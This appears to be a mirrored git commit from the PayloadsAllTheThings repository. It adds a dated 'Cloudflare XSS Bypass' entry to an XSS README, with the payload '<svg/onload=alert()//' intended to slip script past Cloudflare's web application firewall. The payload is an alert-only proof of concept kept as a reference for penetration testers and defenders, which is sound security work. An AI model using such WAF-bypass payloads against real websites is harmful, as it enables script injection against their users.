mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-20 03:16:10 +00:00
Update README.md
Added Cloudflare XSS bypass
This commit is contained in:
parent
bd9378cab7
commit
4b38516e3b
@ -817,6 +817,12 @@ Works for CSP like `script-src self`
|
|||||||
|
|
||||||
## Common WAF Bypass
|
## Common WAF Bypass
|
||||||
|
|
||||||
|
### Cloudflare XSS Bypass - 22nd march 2019 (by @RakeshMane10)
|
||||||
|
|
||||||
|
```
|
||||||
|
<svg/onload=alert()//
|
||||||
|
```
|
||||||
|
|
||||||
### Cloudflare XSS Bypass - 27th february 2018
|
### Cloudflare XSS Bypass - 27th february 2018
|
||||||
|
|
||||||
```html
|
```html
|
||||||
|
Loading…
Reference in New Issue
Block a user